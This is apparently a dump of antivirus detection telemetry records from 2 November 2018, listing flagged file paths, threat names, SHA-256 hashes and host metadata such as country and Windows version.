  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191255-783c0ed0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77aa914e\\AVSCAN-20181102-191229-75ACF0CF\\AVSCAN-20181102-191255-783C0ED0', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:12:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-154019-12849f75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a12a2d7b\\AVSCAN-20181102-150957-346F774B\\AVSCAN-20181102-154019-12849F75', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:43:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='webbooster@iminent.com.xpi', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Datos antiguos de Firefox\\jykvzqpm.default-1372182658215\\Extensions\\webbooster@iminent.com.xpi', filesize=612000, name='Adware/Iminent.qua.#M1.#R1'), hash='080658eab8e145bf98fe4ca8ce442937c4cbefed0973abb2d60146390f2588e7', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='116be10239f0235823ddf2482c7ae09578a3e13b68c56d7d6a37236c7a4e2687', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-6\\116BE10239F0235823DDF2482C7AE09578A3E13B68C56D7D6A37236C7A4E2687', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='116be10239f0235823ddf2482c7ae09578a3e13b68c56d7d6a37236c7a4e2687', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:20:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='trunks.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Trunks\\Trunks.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='40907cdd3aefe9e46592ac5e0c1308c4aa37a4d92a274b566f820b6085cc953e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151204-2deefdc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-151028-2501E207\\AVSCAN-20181102-151204-2DEEFDC9', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153438-e8ec97d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a12a2d7b\\AVSCAN-20181102-150957-346F774B\\AVSCAN-20181102-153438-E8EC97D7', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:37:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4783f014d2af1627ae20396d70f6e15bf294311d5627aed12f4d2cdc00626413', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-20\\4783F014D2AF1627AE20396D70F6E15BF294311D5627AED12F4D2CDC00626413', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='4783f014d2af1627ae20396d70f6e15bf294311d5627aed12f4d2cdc00626413', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:18:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kmpct2km.exe', filepath='e:\\new folder\\kxdriver_ccd_clp_20141029\\kxdriver\\utility\\configtool\\KMPCT2KM.exe', filesize=832000, name='W32/Neshta.A.#M1.#R1'), hash='06455a0a9b2a3090e178a2be8d104349675c82e48a1ab7a3d78bf70645c0fd8c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:35:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setupmda2769a.exe', filepath='D:\\SetupMDA2769a.exe', filesize=35264000, name='W32/Sality.AT.#M1.#R1'), hash='1cbf877fc51334a3fecbb3af7f127735107ae7addd029054611fe36e204b5b0f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\CocCoc\\Browser\\Application\\browser.exe', parentsize=1518968, timestamp='2018-11-02T08:01:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052218-3c9e7ad3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052218-3C9E7AD3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pqafmqtz.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\pQAFMqTZ.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-232741-297f991a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbcc44a7\\AVSCAN-20181102-230036-F9DC4DB5\\AVSCAN-20181102-232741-297F991A', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:27:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050259-8a30da39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050259-8A30DA39', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lawyers.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\LAWYERS\\LAWYERS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054537-7e7f9570', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054537-7E7F9570', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unwise.exe', filepath='C:\\Program Files\\Yahoo!\\Messenger\\UNWISE.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='6c799a753934be6f948c1753fcb37c7b80498f6ba6d848f50bf9459b9cb739bb', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:53:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nenosa.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\tmp6823540\\nenosa.exe', filesize=384000, name='HEUR/AGEN.1019710.#M1.#R1'), hash='49824b90c407fe18622be622af760de3518c95d8718e03ea11132b3f914b813d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yaoaaqvl.exe', filepath='\\\\?\\F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\yaoAaqVL.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184336-76992f43', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a43b94d3\\AVSCAN-20181102-183658-416D5F8F\\AVSCAN-20181102-184336-76992F43', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:32:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150643-9a2e3b62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-150643-9A2E3B62', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:09:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='60770d783d5ed083ac5e9bc84f4e718ba8bc5205750079846a429033fe529e18', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\60770D783D5ED083AC5E9BC84F4E718BA8BC5205750079846A429033FE529E18', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='60770d783d5ed083ac5e9bc84f4e718ba8bc5205750079846a429033fe529e18', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152841-8f1d9453', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-152841-8F1D9453', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:31:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091516-b2d1a115', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ec81ca1\\AVSCAN-20181102-091448-AF391092\\AVSCAN-20181102-091516-B2D1A115', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T01:15:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-104825-5a91f916', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-104746-534354B7\\AVSCAN-20181102-104825-5A91F916', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:51:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052806-0c4f71b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052806-0C4F71B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055653-11a2fe11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055653-11A2FE11', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055620-fdbf29f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055620-FDBF29F0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143655-4df29355', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-143655-4DF29355', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123614-f40c7abd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_80e9aa98\\AVSCAN-20181102-123559-F2831CF6\\AVSCAN-20181102-123614-F40C7ABD', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ektcqqsc.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\EKtCQQSc.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adbcd.exe', filepath='C:\\ADCDA2\\ADBCD.exe', filesize=18176000, name='W32/Sality.AT.#M1.#R1'), hash='68f81ea7dee92cc61587e23ff440fc4b9111df04bfa11e0da88f9bc21f609c02', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:52:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061452-94aafa08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061452-94AAFA08', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051309-f574c75c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051309-F574C75C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061302-5325dd37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061302-5325DD37', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052134-22718f05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052134-22718F05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062609-2877d920', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062609-2877D920', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053635-3b83792f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053635-3B83792F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055105-41e6c56f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055105-41E6C56F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061652-dbfdc7d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061652-DBFDC7D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055315-8f808125', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055315-8F808125', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:14Z'), dt=datetime.date(2018, 11, 2)),
